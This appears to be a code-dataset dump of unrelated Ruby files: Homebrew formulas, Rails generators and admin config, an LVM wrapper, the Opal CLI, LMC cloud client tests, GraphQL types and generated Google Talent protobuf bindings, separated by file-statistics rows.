head "https://github.com/editorconfig/editorconfig-core-c.git"
bottle do
sha256 cellar: :any, arm64_big_sur: "c6d2a8fe0234a4cc7919238c801c2a57c729f50e8d70ee6078d412cff6ef5d08"
sha256 cellar: :any, big_sur: "78142363e9004adc7286f2393e1bfd663dc55d85225d84da75c285d3dfa021e4"
sha256 cellar: :any, catalina: "efae02b7bab638b75b39abf29163349119b993697210e3dfeca5456f610241ec"
sha256 cellar: :any, mojave: "523459616f8fdf7507c66c4c531e329e8bf37c08633e72401de47fdd010990a6"
sha256 cellar: :any, high_sierra: "0f41e7e368a435f1680195d86b7eabbfd46f40a0905bd8dd8b52e199d92fc3f3"
end
depends_on "cmake" => :build
depends_on "pcre2"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args, "-DCMAKE_INSTALL_RPATH=#{rpath}"
system "make", "install"
end
end
test do
system "#{bin}/editorconfig", "--version"
end
end
| 39.258065 | 106 | 0.762531 |
1c83232faa55fa417c87f271ce0a63fb46a80759 | 723 | module Postmarkdown
class InstallGenerator < Rails::Generators::Base
desc File.read(File.expand_path('../usage/install.txt', __FILE__)).gsub('{{CURRENT_DATE}}', Time.zone.now.strftime('%Y-%m-%d'))
source_root File.expand_path('../templates', __FILE__)
class_option :skip_example, :type => :boolean, :group => :runtime, :desc => 'Skip generating an example post'
def create_directory
empty_directory 'app/posts'
end
def generate_example_post
generate 'postmarkdown:post', 'example-post' unless options.skip_example?
end
def add_routes
insert_into_file 'config/routes.rb', " postmarkdown :as => :posts\n\n", :after => "::Application.routes.draw do\n"
end
end
end
| 36.15 | 131 | 0.692946 |
bbc39c5e31656876f69b85a2aa5d6ef779a741a2 | 499 | class Builder
attr_accessor :title, :date, :slug, :image, :lectures_path, :templates_path
def initialize(attributes)
attributes.each do |key, value|
send "#{key}=", value
end
end
def html
input = File.read source_file
lecture = Lecture.new input, title, date, image
lecture.render(layout_file: "#{templates_path}/html/layout.slim")
end
def output_filename
"#@slug.html"
end
private
def source_file
"#{lectures_path}/#@slug.slim"
end
end
| 18.481481 | 77 | 0.669339 |
edcbf40b53e7ea0d17b47ddad2e689c0c1da83a3 | 3,255 | module RailsAdmin
module Config
# Model specific configuration object.
class Model
include RailsAdmin::Config::Proxyable
include RailsAdmin::Config::Configurable
include RailsAdmin::Config::Hideable
include RailsAdmin::Config::Sections
include RailsAdmin::Config::Inspectable
attr_reader :abstract_model
attr_accessor :groups
attr_reader :parent, :root
NAMED_INSTANCE_VARIABLES = [:@parent, :@root].freeze
def initialize(entity)
@parent = nil
@root = self
@abstract_model = begin
if entity.is_a?(RailsAdmin::AbstractModel)
entity
elsif entity.is_a?(Class) || entity.is_a?(String) || entity.is_a?(Symbol)
RailsAdmin::AbstractModel.new(entity)
else
RailsAdmin::AbstractModel.new(entity.class)
end
end
@groups = [RailsAdmin::Config::Fields::Group.new(self, :default).tap { |g| g.label { I18n.translate('admin.form.basic_info') } }]
end
def excluded?
@excluded ||= !RailsAdmin::AbstractModel.all.collect(&:model_name).include?(abstract_model.try(:model_name))
end
def object_label
bindings[:object].send(object_label_method).presence ||
bindings[:object].send(:rails_admin_default_object_label_method)
end
# The display for a model instance (i.e. a single database record).
# Unless configured in a model config block, it'll try to use :name followed by :title methods, then
# any methods that may have been added to the label_methods array via Configuration.
# Failing all of these, it'll return the class name followed by the model's id.
register_instance_option :object_label_method do
@object_label_method ||= Config.label_methods.detect { |method| (@dummy_object ||= abstract_model.model.new).respond_to? method } || :rails_admin_default_object_label_method
end
register_instance_option :label do
(@label ||= {})[::I18n.locale] ||= abstract_model.model.model_name.human
end
register_instance_option :label_plural do
(@label_plural ||= {})[::I18n.locale] ||= abstract_model.model.model_name.human(count: Float::INFINITY, default: label.pluralize(::I18n.locale))
end
def pluralize(count)
count == 1 ? label : label_plural
end
register_instance_option :weight do
0
end
# parent node in navigation/breadcrumb
register_instance_option :parent do
@parent_model ||= begin
klass = abstract_model.model.superclass
klass = nil if klass.to_s.in?(%w(Object BasicObject ActiveRecord::Base))
klass
end
end
register_instance_option :navigation_label do
@navigation_label ||= begin
if (parent_module = abstract_model.model.parent) != Object
parent_module.to_s
end
end
end
register_instance_option :navigation_icon do
nil
end
# Act as a proxy for the base section configuration that actually
# store the configurations.
def method_missing(m, *args, &block)
send(:base).send(m, *args, &block)
end
end
end
end
| 34.263158 | 181 | 0.653149 |
21e7485737111b60da023ab65fcc9af2361eca6b | 543 | require 'lvm/wrapper'
require 'lvm/wrapper/pvs'
require 'lvm/physical_volume_helper'
module LVM
module Wrapper
module VGExtend
# Extend a LVM Volume Group.
# See vor vgextend command http://linux.die.net/man/8/vgextend
def vg_extend(volume_group, physical_volumes)
External.cmd(@server, "#{@command} vgextend #{volume_group.name} #{physical_volumes_to_s(physical_volumes_array)}") if physical_volumes_unused(physical_volumes_array)
end
end # module VGExtend
end # module Wrapper
end # module LVM
| 30.166667 | 174 | 0.736648 |
1aeaa1e9d252816ec1a5a498065c9af437465956 | 1,712 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CDN::Mgmt::V2020_09_01
module Models
#
# Defines the RemoteAddress condition for the delivery rule.
#
class DeliveryRuleRemoteAddressCondition < DeliveryRuleCondition
include MsRestAzure
def initialize
@name = "RemoteAddress"
end
attr_accessor :name
# @return [RemoteAddressMatchConditionParameters] Defines the parameters
# for the condition.
attr_accessor :parameters
#
# Mapper for DeliveryRuleRemoteAddressCondition class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'RemoteAddress',
type: {
name: 'Composite',
class_name: 'DeliveryRuleRemoteAddressCondition',
model_properties: {
name: {
client_side_validation: true,
required: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
parameters: {
client_side_validation: true,
required: true,
serialized_name: 'parameters',
default_value: {},
type: {
name: 'Composite',
class_name: 'RemoteAddressMatchConditionParameters'
}
}
}
}
}
end
end
end
end
| 26.338462 | 78 | 0.550234 |
26276ee7b117041ff54a6ad6e4248f16b25c742b | 4,451 | require 'opal'
require 'rack'
require 'opal/builder'
require 'opal/cli_runners'
module Opal
class CLI
attr_reader :options, :file, :compiler_options, :evals, :load_paths, :argv,
:output, :requires, :gems, :stubs, :verbose, :port, :preload,
:filename, :debug, :no_exit
def compile?
@compile
end
def sexp?
@sexp
end
def skip_opal_require?
@skip_opal_require
end
class << self
attr_accessor :stdout
end
def initialize options = nil
options ||= {}
# Runner
@runner_type = options.delete(:runner) || :nodejs
@port = options.delete(:port) || 3000
@options = options
@compile = !!options.delete(:compile)
@sexp = options.delete(:sexp)
@file = options.delete(:file)
@no_exit = options.delete(:no_exit)
@argv = options.delete(:argv) || []
@evals = options.delete(:evals) || []
@requires = options.delete(:requires) || []
@load_paths = options.delete(:load_paths) || []
@gems = options.delete(:gems) || []
@stubs = options.delete(:stubs) || []
@preload = options.delete(:preload) || []
@output = options.delete(:output) || self.class.stdout || $stdout
@verbose = options.fetch(:verbose, false); options.delete(:verbose)
@debug = options.fetch(:debug, false); options.delete(:debug)
@filename = options.fetch(:filename) { @file && @file.path }; options.delete(:filename)
@skip_opal_require = options.delete(:skip_opal_require)
@compiler_options = Hash[
*compiler_option_names.map do |option|
key = option.to_sym
next unless options.has_key? key
value = options.delete(key)
[key, value]
end.compact.flatten
]
raise ArgumentError, "no runnable code provided (evals or file)" if @evals.empty? and @file.nil?
raise ArgumentError, "unknown options: #{options.inspect}" unless @options.empty?
end
def run
case
when sexp?; show_sexp
when compile?; show_compiled_source
else run_code
end
end
def runner
@runner ||= case @runner_type
when :server; CliRunners::Server.new(output, port)
when :nodejs; CliRunners::Nodejs.new(output)
when :phantomjs; CliRunners::Phantomjs.new(output)
when :applescript; CliRunners::AppleScript.new(output)
else raise ArgumentError, @runner_type.inspect
end
end
def run_code
runner.run(compiled_source, argv)
@exit_status = runner.exit_status
end
attr_reader :exit_status
def compiled_source
Opal.paths.concat load_paths
gems.each { |gem_name| Opal.use_gem gem_name }
builder = Opal::Builder.new stubs: stubs, compiler_options: compiler_options
builder.build 'opal' unless skip_opal_require?
preload.each { |path| builder.build_require(path) }
# FLAGS
builder.build_str '$VERBOSE = true', '(flags)' if verbose
builder.build_str '$DEBUG = true', '(flags)' if debug
# REQUIRES: -r
requires.each do |local_require|
builder.build(local_require)
end
if evals.any?
builder.build_str(evals.join("\n"), '-e')
else
if file and (filename != '-' or evals.empty?)
builder.build_str(file.read, filename)
end
end
builder.build_str 'Kernel.exit', '(exit)' unless no_exit
builder.to_s
end
def show_compiled_source
puts compiled_source
end
def show_sexp
if evals.any?
sexp = Opal::Parser.new.parse(evals.join("\n"), '-e')
else
if file and (file.path != '-' or evals.empty?)
sexp = Opal::Parser.new.parse(file.read, file.path)
end
end
puts sexp.inspect
end
def map
compiler = Opal::Compiler.compile(file.read, options.merge(:file => file.path))
compiler.compile
compiler.source_map
end
def compiler_option_names
%w[
method_missing
arity_check
dynamic_require_severity
source_map_enabled
irb_enabled
inline_operators
]
end
def puts(*args)
output.puts(*args)
end
end
end
| 27.81875 | 102 | 0.585037 |
6a241201e576fcfa45db5795c463badcc6538003 | 963 | class Pwgen < Formula
desc "Password generator"
homepage "https://pwgen.sourceforge.io/"
url "https://downloads.sourceforge.net/project/pwgen/pwgen/2.08/pwgen-2.08.tar.gz"
sha256 "dab03dd30ad5a58e578c5581241a6e87e184a18eb2c3b2e0fffa8a9cf105c97b"
bottle do
cellar :any_skip_relocation
sha256 "185f2f56eb03da60277520734452204ec2e0059cbc1f0af5d0fec1e7fa837658" => :high_sierra
sha256 "01a0709f74923e7b86d680f03d3ec056d3175cb7e54be176a26d5bfae890fd21" => :sierra
sha256 "7dade70b172cb91635afffe8bb1eadb251f9dbd3368ab9e4a37f98a7c0a14b01" => :el_capitan
sha256 "1799bdbb42974d10e2ff3a4e382351b1f03f0a3be31c15ff718d8935d1226101" => :yosemite
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--mandir=#{man}"
system "make", "install"
end
test do
system "#{bin}/pwgen", "--secure", "20", "10"
end
end
| 37.038462 | 93 | 0.719626 |
d584806ac48acb27e9be9c06dddfbe90cc1341fe | 3,929 | # frozen_string_literal: true
require 'test_helper'
class LmcCloudTest < Minitest::Test
def setup
@lmc = LMC::Cloud.new 'example.com', 'user', 'papa', nil, false
end
def test_that_it_can_get_account_objects
cloud = LMC::Cloud.instance
accounts = cloud.get_accounts_objects
refute_empty accounts
assert_instance_of LMC::Account, accounts.first
end
def test_that_account_failures_are_raised
mock_response = Fixtures.test_response({ 'message' => 'failed' }, 500)
@lmc.stub :get, mock_response do
ex = assert_raises RuntimeError do
@lmc.get_accounts_objects
end
assert_equal 'Unable to fetch accounts: failed', ex.to_s
end
end
def test_unhandled_login_failures_are_raised
lmc = LMC::Cloud.allocate
fake_post = lambda { |_url, _body|
bodystring = '{
"timestamp": "2021-07-16T12:06:31.451Z",
"service": "auth",
"version": "9.24.4000",
"status": 400,
"path": "/userlogin",
"code": 199,
"details": {},
"message": "Authentication error",
"type": "DetailedProcessException"
}'
e = Fixtures.restclient_exception bodystring, 400
raise e
}
lmc.stub :post, fake_post do
assert_raises RuntimeError do
lmc.send :initialize, 'localhost', 'admin', 'test1234'
end
end
end
def test_backstage_infos
cloud = LMC::Cloud.instance
infos = cloud.get_backstage_serviceinfos
refute_empty infos
end
def test_password_hidden
cloud = LMC::Cloud.instance
infos = cloud.inspect
refute_match(/password/, infos)
end
def test_put
fake_execute = lambda { |_r|
return OpenStruct.new(:bytesize => 0)
}
c = LMC::Cloud.instance
::RestClient::Request.stub :execute, fake_execute do
response = c.put ['service', 'test'], 'this' => 'body'
assert_kind_of(LMC::LMCResponse, response)
end
end
def test_delete
fake_execute = Minitest::Mock.new
fake_execute.expect :call,
Fixtures.test_restclient_response(''), [Hash]
fake_execute.expect :call,
Fixtures.test_restclient_response('') do |args|
assert_equal args[:method], :delete
assert_equal args[:url], 'https://example.com/foo'
assert_equal args[:headers], { :content_type => 'application/json',
:params => { :ids => ['12', '23'] } }
end
@lmc.stub :execute_request, fake_execute do
@lmc.delete ['foo']
@lmc.delete ['foo'], { ids: ['12', '23'] }
end
assert fake_execute.verify
end
def test_protocol_selection
cloud = LMC::Cloud.instance
pre_state = LMC::Cloud.use_tls
LMC::Cloud.use_tls = false
http_url = cloud.build_url(['test', 'url'])
assert_equal "http://#{LMC::Tests::CredentialsHelper.credentials.ok.host}/test/url", http_url
cloud = LMC::Cloud.instance
LMC::Cloud.use_tls = true
http_url = cloud.build_url(['test', 'url'])
assert_equal "https://#{LMC::Tests::CredentialsHelper.credentials.ok.host}/test/url", http_url
LMC::Cloud.use_tls = pre_state
end
def test_exception_logging
fake_execute = lambda { |_r|
response = RestClient::Response.create '{"message": "FAIL"}', Net::HTTPResponse.new('', '200', ''), RestClient::Request.new({ :method => :post, url: 'http://localhost/' })
ex = RestClient::ExceptionWithResponse.new response, 500
ex.message = 'buh'
raise ex
}
fake_puts = Minitest::Mock.new
fake_puts.expect :call, nil, ['EXCEPTION: buh']
fake_puts.expect :call, nil, ['EX.response: {"message": "FAIL"}']
fake_puts.expect :call, nil, ['FAIL']
LMC::Cloud.stub :debug, true do
@lmc.stub :puts, fake_puts, String do
RestClient::Request.stub :execute, fake_execute do
assert_raises LMC::ResponseException do
@lmc.get []
end
end
end
end
end
end
| 30.223077 | 177 | 0.640112 |
1c9f5a89cac594d0ce243754a063693a4084aa18 | 1,647 | require 'spec_helper'
module RailsBestPractices
module Reviews
describe MoveCodeIntoHelperReview do
let(:runner) { Core::Runner.new(reviews: MoveCodeIntoHelperReview.new('array_count' => 2)) }
it "should move code into helper" do
content = <<-EOF
<%= select_tag :state, options_for_select( [[t(:draft), "draft"],
[t(:published), "published"]],
params[:default_state] ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(1)
expect(runner.errors[0].to_s).to eq("app/views/posts/show.html.erb:1 - move code into helper (array_count >= 2)")
end
it "should not move code into helper with simple arguments" do
content = <<-EOF
<%= select_tag :state, options_for_select( Post.STATES ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(0)
end
it "should not check ignored files" do
runner = Core::Runner.new(reviews: MoveCodeIntoControllerReview.new('array_count' => 2, 'ignored_files' => /app\/views\/post/))
content = <<-EOF
<%= select_tag :state, options_for_select( [[t(:draft), "draft"],
[t(:published), "published"]],
params[:default_state] ) %>
EOF
runner.review('app/views/posts/show.html.erb', content)
expect(runner.errors.size).to eq(0)
end
end
end
end
| 41.175 | 135 | 0.555556 |
bbce767d30feb02f3008821323798bd858b7d2f1 | 703 | Pod::Spec.new do |s|
s.name = 'ObjectiveLibModbus'
s.version = '0.0.1'
s.license = 'GNU'
s.summary = 'Obj-C wrapper for libmodbus.'
s.homepage = 'https://github.com/iUtvikler/ObjectiveLibModbus'
s.author = { 'Lars-Jørgen Kristiansen' => '[email protected]' }
s.source = { :git => 'https://github.com/iUtvikler/ObjectiveLibModbus.git', :tag => '0.0.1' }
s.description = 'ObjectiveLibModbus is an Objective-C wrapper class for the libmodbus library.' \
'I included tweaked and compiled libmodbus sourcefiles, that work with OS X and iOS in this project'
s.source_files = 'ObjectiveLibModbus/*.{h,m}', 'Vendor/libmodbus/*.{c,h}'
s.requires_arc = true
end
| 50.214286 | 118 | 0.671408 |
bb15f4f06d43741285a6afb42772accb5a7f93bf | 222 | namespace :create do
task user: :environment do
User.create(
email: ENV['email'],
password: ENV['password'],
first_name: 'Mary',
last_name: 'Poppins',
role: 'registered'
)
end
end
| 18.5 | 32 | 0.585586 |
03ca9b7a5746a6261d3d064d6ee19ceec97660de | 650 | require_relative '../spec_helper'
def expect_page_to_be_at_top
page.document.synchronize do |variable|
scroll_top = page.evaluate_script('$("html, body").scrollTop()')
raise Capybara::ElementNotFound, "Page is not at the top. Scroll top = #{scroll_top}" unless scroll_top == 0
end
end
feature 'JQuery Back to Top', js: true do
scenario 'using the component' do
visit '/css_components_forms.html'
expect(page).not_to have_css('.back-to-top')
page.evaluate_script('$("html, body").scrollTop(500)')
page.find('.back-to-top').click
expect_page_to_be_at_top
expect(page).not_to have_css('.back-to-top')
end
end
| 29.545455 | 112 | 0.712308 |
b9401b1579c5c5e6615a068b47028b5847fd7f1d | 173 | module Serverspec::Type
class Ipfilter < Base
def has_rule?(rule)
@runner.check_ipfilter_has_rule(rule)
end
def to_s
'ipfilter'
end
end
end
| 14.416667 | 43 | 0.647399 |
3823bd94083229f5d1c60bbb9e06da374adc599f | 919 | # frozen_string_literal: true
module Types
module Tree
# rubocop: disable Graphql/AuthorizeTypes
# This is presented through `Repository` that has its own authorization
class BlobType < BaseObject
implements Types::Tree::EntryType
present_using BlobPresenter
graphql_name 'Blob'
field :web_url, GraphQL::STRING_TYPE, null: true,
description: 'Web URL of the blob.'
field :web_path, GraphQL::STRING_TYPE, null: true,
description: 'Web path of the blob.'
field :lfs_oid, GraphQL::STRING_TYPE, null: true,
description: 'LFS ID of the blob.'
field :mode, GraphQL::STRING_TYPE, null: true,
description: 'Blob mode in numeric format.'
def lfs_oid
Gitlab::Graphql::Loaders::BatchLfsOidLoader.new(object.repository, object.id).find
end
end
# rubocop: enable Graphql/AuthorizeTypes
end
end
| 31.689655 | 90 | 0.67247 |
ac146441457816528d929a0bd713500c3b3b38c4 | 206 | <% module_namespacing do -%>
class <%= class_name %>Preview < ActionMailer::Preview
<% actions.each do |action| -%>
def <%= action %>
<%= class_name %>.<%= action %>
end
<% end -%>
end
<% end -%>
| 17.166667 | 54 | 0.567961 |
d58ff2f7ef02ef114355bed4e0790a5f24cf5ae0 | 11,391 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/talent/v4beta1/filters.proto
require 'google/protobuf'
require 'google/api/field_behavior_pb'
require 'google/cloud/talent/v4beta1/common_pb'
require 'google/protobuf/duration_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
require 'google/protobuf/wrappers_pb'
require 'google/type/date_pb'
require 'google/type/latlng_pb'
require 'google/type/timeofday_pb'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/talent/v4beta1/filters.proto", :syntax => :proto3) do
add_message "google.cloud.talent.v4beta1.JobQuery" do
optional :query, :string, 1
optional :query_language_code, :string, 14
repeated :companies, :string, 2
repeated :location_filters, :message, 3, "google.cloud.talent.v4beta1.LocationFilter"
repeated :job_categories, :enum, 4, "google.cloud.talent.v4beta1.JobCategory"
optional :commute_filter, :message, 5, "google.cloud.talent.v4beta1.CommuteFilter"
repeated :company_display_names, :string, 6
optional :compensation_filter, :message, 7, "google.cloud.talent.v4beta1.CompensationFilter"
optional :custom_attribute_filter, :string, 8
optional :disable_spell_check, :bool, 9
repeated :employment_types, :enum, 10, "google.cloud.talent.v4beta1.EmploymentType"
repeated :language_codes, :string, 11
optional :publish_time_range, :message, 12, "google.cloud.talent.v4beta1.TimestampRange"
repeated :excluded_jobs, :string, 13
end
add_message "google.cloud.talent.v4beta1.ProfileQuery" do
optional :query, :string, 1
repeated :location_filters, :message, 2, "google.cloud.talent.v4beta1.LocationFilter"
repeated :job_title_filters, :message, 3, "google.cloud.talent.v4beta1.JobTitleFilter"
repeated :employer_filters, :message, 4, "google.cloud.talent.v4beta1.EmployerFilter"
repeated :education_filters, :message, 5, "google.cloud.talent.v4beta1.EducationFilter"
repeated :skill_filters, :message, 6, "google.cloud.talent.v4beta1.SkillFilter"
repeated :work_experience_filter, :message, 7, "google.cloud.talent.v4beta1.WorkExperienceFilter"
repeated :time_filters, :message, 8, "google.cloud.talent.v4beta1.TimeFilter"
optional :hirable_filter, :message, 9, "google.protobuf.BoolValue"
repeated :application_date_filters, :message, 10, "google.cloud.talent.v4beta1.ApplicationDateFilter"
repeated :application_outcome_notes_filters, :message, 11, "google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter"
repeated :application_job_filters, :message, 13, "google.cloud.talent.v4beta1.ApplicationJobFilter"
optional :custom_attribute_filter, :string, 15
optional :candidate_availability_filter, :message, 16, "google.cloud.talent.v4beta1.CandidateAvailabilityFilter"
repeated :availability_filters, :message, 18, "google.cloud.talent.v4beta1.AvailabilityFilter"
repeated :person_name_filters, :message, 17, "google.cloud.talent.v4beta1.PersonNameFilter"
end
add_message "google.cloud.talent.v4beta1.LocationFilter" do
optional :address, :string, 1
optional :region_code, :string, 2
optional :lat_lng, :message, 3, "google.type.LatLng"
optional :distance_in_miles, :double, 4
optional :telecommute_preference, :enum, 5, "google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference"
optional :negated, :bool, 6
end
add_enum "google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference" do
value :TELECOMMUTE_PREFERENCE_UNSPECIFIED, 0
value :TELECOMMUTE_EXCLUDED, 1
value :TELECOMMUTE_ALLOWED, 2
end
add_message "google.cloud.talent.v4beta1.CompensationFilter" do
optional :type, :enum, 1, "google.cloud.talent.v4beta1.CompensationFilter.FilterType"
repeated :units, :enum, 2, "google.cloud.talent.v4beta1.CompensationInfo.CompensationUnit"
optional :range, :message, 3, "google.cloud.talent.v4beta1.CompensationInfo.CompensationRange"
optional :include_jobs_with_unspecified_compensation_range, :bool, 4
end
add_enum "google.cloud.talent.v4beta1.CompensationFilter.FilterType" do
value :FILTER_TYPE_UNSPECIFIED, 0
value :UNIT_ONLY, 1
value :UNIT_AND_AMOUNT, 2
value :ANNUALIZED_BASE_AMOUNT, 3
value :ANNUALIZED_TOTAL_AMOUNT, 4
end
add_message "google.cloud.talent.v4beta1.CommuteFilter" do
optional :commute_method, :enum, 1, "google.cloud.talent.v4beta1.CommuteMethod"
optional :start_coordinates, :message, 2, "google.type.LatLng"
optional :travel_duration, :message, 3, "google.protobuf.Duration"
optional :allow_imprecise_addresses, :bool, 4
oneof :traffic_option do
optional :road_traffic, :enum, 5, "google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic"
optional :departure_time, :message, 6, "google.type.TimeOfDay"
end
end
add_enum "google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic" do
value :ROAD_TRAFFIC_UNSPECIFIED, 0
value :TRAFFIC_FREE, 1
value :BUSY_HOUR, 2
end
add_message "google.cloud.talent.v4beta1.JobTitleFilter" do
optional :job_title, :string, 1
optional :negated, :bool, 2
end
add_message "google.cloud.talent.v4beta1.SkillFilter" do
optional :skill, :string, 1
optional :negated, :bool, 2
end
add_message "google.cloud.talent.v4beta1.EmployerFilter" do
optional :employer, :string, 1
optional :mode, :enum, 2, "google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode"
optional :negated, :bool, 3
end
add_enum "google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode" do
value :EMPLOYER_FILTER_MODE_UNSPECIFIED, 0
value :ALL_EMPLOYMENT_RECORDS, 1
value :CURRENT_EMPLOYMENT_RECORDS_ONLY, 2
value :PAST_EMPLOYMENT_RECORDS_ONLY, 3
end
add_message "google.cloud.talent.v4beta1.EducationFilter" do
optional :school, :string, 1
optional :field_of_study, :string, 2
optional :degree_type, :enum, 3, "google.cloud.talent.v4beta1.DegreeType"
optional :negated, :bool, 6
end
add_message "google.cloud.talent.v4beta1.WorkExperienceFilter" do
optional :min_experience, :message, 1, "google.protobuf.Duration"
optional :max_experience, :message, 2, "google.protobuf.Duration"
end
add_message "google.cloud.talent.v4beta1.ApplicationDateFilter" do
optional :start_date, :message, 1, "google.type.Date"
optional :end_date, :message, 2, "google.type.Date"
end
add_message "google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter" do
optional :outcome_notes, :string, 1
optional :negated, :bool, 2
end
add_message "google.cloud.talent.v4beta1.ApplicationJobFilter" do
optional :job_requisition_id, :string, 2
optional :job_title, :string, 3
optional :negated, :bool, 4
end
add_message "google.cloud.talent.v4beta1.TimeFilter" do
optional :start_time, :message, 1, "google.protobuf.Timestamp"
optional :end_time, :message, 2, "google.protobuf.Timestamp"
optional :time_field, :enum, 3, "google.cloud.talent.v4beta1.TimeFilter.TimeField"
end
add_enum "google.cloud.talent.v4beta1.TimeFilter.TimeField" do
value :TIME_FIELD_UNSPECIFIED, 0
value :CREATE_TIME, 1
value :UPDATE_TIME, 2
end
add_message "google.cloud.talent.v4beta1.CandidateAvailabilityFilter" do
optional :negated, :bool, 1
end
add_message "google.cloud.talent.v4beta1.AvailabilityFilter" do
optional :signal_type, :enum, 1, "google.cloud.talent.v4beta1.AvailabilitySignalType"
optional :range, :message, 2, "google.cloud.talent.v4beta1.TimestampRange"
optional :required, :bool, 3
end
add_message "google.cloud.talent.v4beta1.PersonNameFilter" do
optional :person_name, :string, 1
end
end
end
module Google
module Cloud
module Talent
module V4beta1
JobQuery = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.JobQuery").msgclass
ProfileQuery = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ProfileQuery").msgclass
LocationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.LocationFilter").msgclass
LocationFilter::TelecommutePreference = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.LocationFilter.TelecommutePreference").enummodule
CompensationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CompensationFilter").msgclass
CompensationFilter::FilterType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CompensationFilter.FilterType").enummodule
CommuteFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CommuteFilter").msgclass
CommuteFilter::RoadTraffic = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CommuteFilter.RoadTraffic").enummodule
JobTitleFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.JobTitleFilter").msgclass
SkillFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.SkillFilter").msgclass
EmployerFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EmployerFilter").msgclass
EmployerFilter::EmployerFilterMode = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EmployerFilter.EmployerFilterMode").enummodule
EducationFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.EducationFilter").msgclass
WorkExperienceFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.WorkExperienceFilter").msgclass
ApplicationDateFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationDateFilter").msgclass
ApplicationOutcomeNotesFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationOutcomeNotesFilter").msgclass
ApplicationJobFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.ApplicationJobFilter").msgclass
TimeFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.TimeFilter").msgclass
TimeFilter::TimeField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.TimeFilter.TimeField").enummodule
CandidateAvailabilityFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.CandidateAvailabilityFilter").msgclass
AvailabilityFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.AvailabilityFilter").msgclass
PersonNameFilter = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.talent.v4beta1.PersonNameFilter").msgclass
end
end
end
end
| 59.952632 | 183 | 0.755421 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.